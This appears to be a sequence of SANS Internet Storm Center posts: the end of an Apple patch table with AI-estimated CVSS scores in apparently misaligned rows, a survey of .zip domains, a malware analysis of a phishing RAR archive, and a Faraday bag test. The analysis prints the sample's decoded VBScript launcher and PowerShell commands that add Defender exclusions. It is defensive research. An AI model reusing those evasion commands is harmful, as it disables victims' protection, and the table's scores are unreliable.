A shortcut may be able to use sensitive data with certain actions without prompting the user   x   x x   x   CVE-2023-32404 [important] ChatGPT-CVSS: 6.2 Shortcuts
This issue was addressed with improved entitlements.
An app may be able to bypass Privacy preferences   x   x     x   CVE-2023-32394 [moderate] ChatGPT-CVSS: 5.3 Siri
The issue was addressed with improved checks.
A person with physical access to a device may be able to view contact information from the lock screen   x x x     x   CVE-2023-32376 [important] ChatGPT-CVSS: 7.0 StorageKit
This issue was addressed with improved entitlements.
An app may be able to modify protected parts of the file system   x x x     x   CVE-2023-28202 [moderate] ChatGPT-CVSS: N/A System Settings
This issue was addressed with improved state management.
An app firewall setting may not take effect after exiting the Settings app   x x x     x   CVE-2023-32412 [moderate] ChatGPT-CVSS: 7.8 Telephony
A use-after-free issue was addressed with improved memory management.
A remote attacker may be able to cause unexpected app termination or arbitrary code execution   x x x x x x x CVE-2023-32408 [important] ChatGPT-CVSS: 7.5 TV App
The issue was addressed with improved handling of caches.
An app may be able to read sensitive location information   x x x x   x x CVE-2023-32389 [important] ChatGPT-CVSS: 7.5 Wi-Fi
This  issue was addressed with improved redaction of sensitive information.
An app may be able to disclose kernel memory   x x x     x   CVE-2023-32411 [important] ChatGPT-CVSS: 6.5 AppleMobileFileIntegrity
This issue was addressed with improved entitlements.
An app may be able to bypass Privacy preferences     x x   x x x CVE-2023-32422 [moderate] ChatGPT-CVSS: 6.5 SQLite
This issue was addressed by adding additional SQLite logging restrictions.
An app may be able to access data from other apps by enabling additional SQLite logging     x x     x   CVE-2023-32415 [important] ChatGPT-CVSS: 5.3 Weather
This  issue was addressed with improved redaction of sensitive information.
An app may be able to read sensitive location information     x x     x   CVE-2023-32371 [important] ChatGPT-CVSS: 6.5 Associated Domains
The issue was addressed with improved checks.
An app may be able to break out of its sandbox       x     x   CVE-2023-32419 [moderate] ChatGPT-CVSS: 8.8 Cellular
The issue was addressed with improved bounds checks.
A remote attacker may be able to cause arbitrary code execution       x         CVE-2023-32385 [moderate] ChatGPT-CVSS: 4.3 PDFKit
A denial-of-service issue was addressed with improved memory handling.
Opening a PDF file may lead to unexpected app termination       x     x   CVE-2023-32365 [moderate] ChatGPT-CVSS: N/A Photos
The issue was addressed with improved checks.
Shake-to-undo may allow a deleted photo to be re-surfaced without authentication       x x       CVE-2023-32367 [important] ChatGPT-CVSS: 7.5 Security
This issue was addressed with improved entitlements.
An app may be able to access user-sensitive data       x     x   CVE-2023-23532 [important] ChatGPT-CVSS: 7.0 Apple Neural Engine
This issue was addressed with improved checks.
An app may be able to break out of its sandbox         x       CVE-2023-28181 [important] ChatGPT-CVSS: 9.8 CoreCapture
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges         x x     CVE-2023-32410 [important] ChatGPT-CVSS: 7.5 IOSurface
An out-of-bounds read was addressed with improved input validation.
An app may be able to leak sensitive kernel state         x x x x CVE-2023-27940 [moderate] ChatGPT-CVSS: 4.0 Kernel
The issue was addressed with additional permissions checks.
A sandboxed app may be able to observe system-wide network connections         x   x x CVE-2023-32397 [important] ChatGPT-CVSS: 6.5 Shell
A logic issue was addressed with improved state management.
An app may be able to modify protected parts of the file system         x x x x CVE-2023-32386 [moderate] ChatGPT-CVSS: 5.0 Contacts
A privacy issue was addressed with improved handling of temporary files.
An app may be able to observe unprotected user data           x x x CVE-2023-32360 [moderate] ChatGPT-CVSS: 6.5 CUPS
An authentication issue was addressed with improved state management.
An unauthenticated user may be able to access recently printed documents           x x x CVE-2023-32387 [moderate] ChatGPT-CVSS: 8.8 dcerpc
A use-after-free issue was addressed with improved memory management.
A remote attacker may be able to cause unexpected app termination or arbitrary code execution           x x x CVE-2023-27945 [moderate] ChatGPT-CVSS: 4.3 Dev Tools
This issue was addressed with improved entitlements.
A sandboxed app may be able to collect system logs           x   x CVE-2023-32369 [important] ChatGPT-CVSS: 6.5 libxpc
A logic issue was addressed with improved state management.
An app may be able to modify protected parts of the file system           x x x CVE-2023-32405 [important] ChatGPT-CVSS: 7.8 libxpc
A logic issue was addressed with improved checks.
An app may be able to gain root privileges           x x x CVE-2023-32380 [critical] ChatGPT-CVSS: 8.8 Model I/O
An out-of-bounds write issue was addressed with improved bounds checking.
Processing a 3D model may lead to arbitrary code execution           x x x CVE-2023-32382 [important] ChatGPT-CVSS: 5.3 Model I/O
An out-of-bounds read was addressed with improved input validation.
Processing a 3D model may result in disclosure of process memory           x x x CVE-2023-32355 [important] ChatGPT-CVSS: 7.5 PackageKit
A logic issue was addressed with improved state management.
An app may be able to modify protected parts of the file system           x x x CVE-2023-32395 [important] ChatGPT-CVSS: 7.0 Perl
A logic issue was addressed with improved state management.
An app may be able to modify protected parts of the file system           x x x CVE-2023-32414 [important] ChatGPT-CVSS: 4.0 DesktopServices
The issue was addressed with improved checks.
An app may be able to break out of its sandbox             x   CVE-2023-32375 [important] ChatGPT-CVSS: 7.5 Model I/O
An out-of-bounds read was addressed with improved input validation.
Processing a 3D model may result in disclosure of process memory             x x CVE-2023-32363 [important] ChatGPT-CVSS: 0 Screen Saver
A permissions issue was addressed by removing vulnerable code and adding additional checks.
An app may be able to bypass Privacy preferences             x   CVE-2023-23535 [important] ChatGPT-CVSS: 7.5 ImageIO
The issue was addressed with improved memory handling.
Processing a maliciously crafted image may result in disclosure of process memory               x

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A week ago, I wrote about Google starting to offer ".zip" domains and the possible risks associated with this [1]. Earlier today, I quickly surveyed registered .zip domains to see what people are doing with them. 

I found a total of 2,753 domains with content. Out of these files, I was able to categorize 1,928. The remaining is still a work in progress.

So far, most domains are "Parked" (1,506). This is typical for new domains displaying a registrar default page until the owner configures content. 229 of the domains are showing various errors. I classified 143 domains as harmless, meaning they link to different other pages that, as far as I can tell, do not provide malicious content. Some "harmless" sites appear registered by security companies or individuals either directing to their page or displaying messages warning about the .zip TLD issues. A few of the pages do, for example, direct to individual LinkedIn profiles.

48 domains direct to Rick Ashley ("rickrolling") content or similar videos mostly meant to annoy visitors.

So far, I only found one domain that I consider "suspect": fermwartung[.]zip ("Fernwartung" is the German word for Remote Maintenance). It directs to what looks like a legitimate company's webpage, but the download triggers some suspicious signatures on Virustotal [2]. I am unfamiliar with the company, but according to the web page, they appear to be an IT service provider. It is possible that their remote assistance tool triggers some Anti-Virus warnings.

sentineloneinstaller[.]zip appeared to be advertising Norton Anti-Virus. Currently, the website is down, so I cannot verify if it attempted to play the "fake anti-virus" game.

This is still a work in progress, and I will update this story as I can classify more domains. The classification is based on keywords, so I will surely miss something. Let me know if you find an "interesting" (malicious) .zip domain.

A couple of sites offered online compression/decompression of zip files. There is an obvious risk here that, first of all, the file's content may be leaked, and secondly, the file you get back may be altered. But this is not specific to the ".zip" TLD, and I classified these sites as "harmless" for now.

One site displayed a login form. But I suspect this was just a login form for the site's admin interface. It did not resemble a brand I recognized and only asked for a password, not a username.

[1] https://isc.sans.edu/diary/The+zip+gTLD+Risks+and+Opportunities/29838/
[2] https://www.virustotal.com/gui/file/06298771950708c66951149af0962079c260e08d9eb536a17d9c5f54c0d888a7

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This isn't a new attack vector, but I’ve found many malicious RAR SFX files in the wild for a few weeks. An “SFX” file is a self-extracting archive that contains compressed files and is wrapped up with some executable code to decompress them on the fly. The final user receives an executable file (PE file) that can be launched with the need to install a specific tool to decompress the content.  This technique has been used for a while by attackers, and even more interesting, the self-decompression routine can launch any executable (another executable, a script, …)[1]

Most of the time, these files aren’t detected as a known threat because payloads (the files) are compressed (sometimes encrypted too - if a password is used). But they are generally detected as “suspicious”. I wrote a simple YARA rule to detect such files:

rule SelfExtractingRAR { meta: description = "Detects an SFX archive with automatic script execution” author = “Xavier “Mertens <xmertens@isc.sans.edu>” strings: $exeHeader = "MZ" $rarHeader = "Rar!" wide ascii $sfxSignature = "SFX" wide ascii $sfxSetup = "Setup=" wide ascii condition: $exeHeader at 0 and $rarHeader and $sfxSignature and $sfxSetup }

Here is an example of such SFX file that I spotted yesterday. The file was delivered through a phishing campaign and was called "USD 1,810,500.exe” with the following SHA256: e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963[2]. A good point with such files is that you don’t need to execute them to extract the content. A classic rar command will do the job:

remnux@remnux:/MalwareZoo/20230516$ rar t "USD 1,810,500.exe" RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017 Trial version Type 'rar -?' for help Testing archive USD 1,810,500.exe 1ktZ3RF93vZq427h3lvsYTk434w53G56ek6xCJ SILENT= 144k80p185MQ7FN1 sF7Yy34s49U9R76Rku09Q0L19P Setup=wscript Update-sk.s.vbe q2X4nb8h8ay8003mjTM3W41S2Q77ssEIDH7zXpA Path=%homedrive%\pxbc TDaTWZ41l2f4d80XMx97NB5C298bdY Update=U 06646163K1p2p66F 67562az6K38H90tYJgQTx963kZWMg Testing vicmmge.buj OK Testing uhupfsx.xml OK Testing kmpxxcxmlq.docx OK Testing Update-sk.s.vbe OK Testing pxqic.pif OK Testing fpss.msc OK Testing epmtilluig.xml OK Testing psxgfd.icm OK Testing pprwvki.ppt OK Testing qcrk.xls OK Testing ppldgtbkm.xml OK Testing loffd.mp3 OK Testing wfsdrusej.icm OK Testing utmkbkhe.jpg OK Testing lhuhm.docx OK Testing jcftejksj.xls OK Testing nkeej.xl OK Testing wtnjesas.pdf OK Testing riaam.txt OK Testing clff.pdf OK Testing rnovsgsm.txt OK Testing gcprhnl.xls OK Testing lhulocrs.xls OK Testing bxmrh.msc OK Testing xsdmudolb.xml OK Testing xppwqdiutn.jpg OK Testing eleuutbq.ppt OK Testing cttrdjfv.xml OK Testing ccgjrkh.ini OK Testing lpuukd.icm OK Testing eetv.exe OK Testing sqtu.docx OK Testing uvkmtkcrvq.icm OK Testing efitdtqci.bmp OK Testing ruvjtenq.mp3 OK Testing wucrjivio.pdf OK Testing bhbeq.icm OK Testing waemwttb.pdf OK Testing wfhesiw.xml OK Testing sxvkks.xls OK Testing negbxaqdr.msc OK Testing wmlpuwiwdd.ini OK Testing vged.msc OK Testing pmevdiqiww.ppt OK Testing gwrtofbgi.mp3 OK Testing kejrxfveni.jpg OK Testing bnubxgq.pdf OK Testing bdldxj.msc OK Testing hnbfjb.icm OK Testing tpshh.xml OK Testing exdsgg.icm OK Testing jmwnkkmc.icm OK Testing bkmlgvggjq.xml OK Testing mqen.bin OK Testing inxwfoap.dll OK Testing qxskgk.ppt OK Testing etiwhseh.txt OK Testing gvgbbm.mp3 OK Testing duacabnhh.txt OK Testing blcvjevx.msc OK Testing xjwwawkp.msc OK Testing jfbbaim.dat OK Testing xksrkjuj.exe OK Testing dndafdxcs.docx OK Testing cauhoxnn.bmp OK Testing adtp.icm OK Testing miwvkhxw.xml OK Testing dtmisespef.pdf OK Testing dntdl.xls OK Testing pmibtqovo.bin OK Testing jjbilmi.xls OK Testing hspofc.xml OK Testing wniu.ppt OK Testing ugrjeq.xls OK Testing trgwpgvg.msc OK Testing meul.exe OK Testing ejlmpu.dll OK Testing jnjvc.xml OK Testing okmsufva.ppt OK Testing urgqtjbjdv.xml OK Testing mbojgfvxl.ini OK All OK

The purpose of the files was to create some trust in the archive. But most of the files contain garbage data. Here are the only interesting ones:

remnux@remnux:/MalwareZoo/20230516/out$ file * | grep -v "UTF-8" kmpxxcxmlq.docx: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators pxqic.pif: PE32 executable (GUI) Intel 80386, for MS Windows uhupfsx.xml: ASCII text, with CRLF line terminators Update-sk.s.vbe: Little-endian UTF-16 Unicode text, with CRLF line terminators vicmmge.buj: ASCII text, with very long lines, with no line terminators

The interesting information is returned when you test the archive (see above):

Setup=wscript Update-sk.s.vbe Path=%homedrive%\pxbc

Files will be extracted in the 'C:\pxbc' (if the victim has rights to do it) and the script ‘Update-sk.s.vbe’ will be executed.

The script is nicely obfuscated. It’s encoded In UTL-16 LE, and the code is polluted with many comments with a lot of Chinese characters. Here is a decoded version:

remnux@remnux://MalwareZoo/20230516/out$ iconv -c -f UTF-16LE -t ASCII Update-sk.s.vbe | grep -v "^'" on error resume next o_j_no fvxnvbahlwqjenu = "kmpxxcxmlq.docx" wckwqfuoxpx = StrReverse("fip.ciqxp") hknghkuuktxdvfx = hotbnrfdsuedk("llehS.tpircSW") Set obxigdixuharkko = WScript.CreateObject(hknghkuuktxdvfx ) xwduhpaha = wckwqfuoxpx + " " + fvxnvbahlwqjenu obxigdixuharkko.Run xwduhpaha function hotbnrfdsuedk(senlukbqxmcs) hotbnrfdsuedk = StrReverse(senlukbqxmcs) End function Sub o_j_no o_j_no = execute (StrReverse(peelS.tpircSW) + "4000") End Sub Sub twvrtegjxowwq(VAR) twvrtegjxowwq = StrReverse(VAR) End Sub

This VBS script is easy to understand. It will:

1. Wait for 4 seconds
2. Create a WScript.Shell object
3. Run the command “pxqic.pif kmpxxcxmlq.docx”

The .pif file is an AutoIT-compiled script that will execute the file's content passed as an argument. The file is also encoded and obfuscated. It contains a malicious PowerShell script. Here is how to extract it easily:

remnux@remnux:/MalwareZoo/20230516/out$ cat kmpxxcxmlq.docx | \ iconv -f UTF-16LE -t ASCII -c | \ sed -n '/\#ce/,/\#cs/p' kmpxxcxmlq.docx.out | \ grep -v '^[#|;]'

I did not publish the decode PowerShell script here because it's too big. The script is used as an anti-VM and anti-debugging script. It prevents Microsoft Defender from scanning some files and directories:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe' "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\pxbc "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs' "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe' "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe

Here is the code responsible for this:

Func AntiVirus() $owmi = ObjGet("winmgmts:\\localhost\root\SecurityCenter2") $colitems = $owmi.execquery("Select * from AntiVirusProduct") For $objantivirusproduct In $colitems $usb = $objantivirusproduct.displayname Next Return $usb EndFunc Func Disabler() if AntiVirus() = "Windows Defender" Then ;#RequireAdmin ShellExecute("powershell"," -Command Add-MpPreference -ExclusionPath " & @ScriptDir,"","",@SW_HIDE) ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'","","",@SW_HIDE) ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbs'","","",@SW_HIDE) ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbe'","","",@SW_HIDE) ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'","","",@SW_HIDE) ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'","","",@SW_HIDE) ;EndIf endFunc

The PowerShell also has a shellcode; it reads data from another obfuscated file. I still need more time to go deeper...

Finally, the .pif executable launches a 'RegSvcs.exe' and performs more code injection on it:

[1] https://www.rarlab.com/vuln_sfx_html.htm
[2] https://bazaar.abuse.ch/sample/e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

There are situations where it is desired to block signals between devices. Commonly scenarios are when traveling, in a location of uncertain safety, or otherwise concerned with data privacy and geolocation. I was curious how well a faraday bags and similar products protected wireless communications. A more common purchase these days are wallets that can help to protect against RFID skimming of credit card data [1].

Here were the scenarios tested using some faraday bags (Haftigts) [2]:

Wireless Communications Scenario / Device 125 kHz RFID HID proximity card, read with Flipper Zero
HID proximity fob, read with Flipper Zero NFC Credit Card, read with Flipper Zero Bluetooth Phone in bag and bluetooth earbuds WiFi (802.11) Phone in bag used as hotspot, laptop connected to hotspot Celluar Phone in bag, another cellular phone used to call it

Extensive testing was done done using a variety of faraday bags and devices.

Scenario Testing Process HID proximity card HID proximity card placed into bag
Bag closed and sealed
Flipper Zero placed on top of bag over card location
Flipper Zero used to read 125 kHz RFID data HID proximity fob HID proximity fob placed into bag
Bag closed and sealed
Flipper Zero placed on top of bag over card location
Flipper Zero used to read 125 kHz RFID data Credit Card Credit card placed into bag
Bag closed and sealed
Flipper Zero placed on top of bag over card location
Flipper Zero used to read NFC data Bluetooth iPhone connected to iPods via Bluetooth
iPhone playing audio content
iPhone placed into bag
Listened for audio disruptions WiFi (802.11) Android phone with hotspot turned on
Windows device connected to hotspot
Continuous ping set to %%ip:8.8.8.8%%
Android phone placed into bag
Ping reviewed for disruptions Cellular iPhone placed into bag
Android phone used to call iPhone

The results for these different tests were pretty quick. For the Flipper Zero tests, either the data could be read or it couldn't. For bluetooth and wifi, it was just waiting to see how the signal changed. Now for the results:

Scenario Result HID proximity card Fail
(Flipper Zero was able to read the data) HID proximity fob Fail
(Flipper Zero was able to read the data) Credit Card Success
(Flipper Zero was unable to read the data) Bluetooth Limited Success
(Audio signal cut in and out, heavily impacted by proper sealing of the bag) WiFi (802.11) Success
(Wireless network was quickly disconnected and unable to be seen from mobile hotspot feature) Cellular Success
(iPhone was unable to receive phone call, Android phone was directed straight to voicemail)

From the testing, there were a few takeaways:

• Test to make sure your protections are effective
• Make sure to follow instructions - Bluetooth audio was very functional with a partially closed bag
• When in doubt, turn off features, or devices, if not needed and when in a space of uncertain safety

For some of these attacks, someone would need very close proximity to complete a successful attack. In the case of testing using the Flipper Zero, the reader was physically sitting on top of the bag and that would be much more challenging for someone to do in a real world situation.

[1] https://www.zdnet.com/article/do-rfid-blocking-cards-actually-work-my-flipper-zero-revealed-the-truth/
[2] https://www.amazon.com/dp/B0BHSH8BLR?ref=ppx_yo2ov_dt_b_product_details&th=1

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.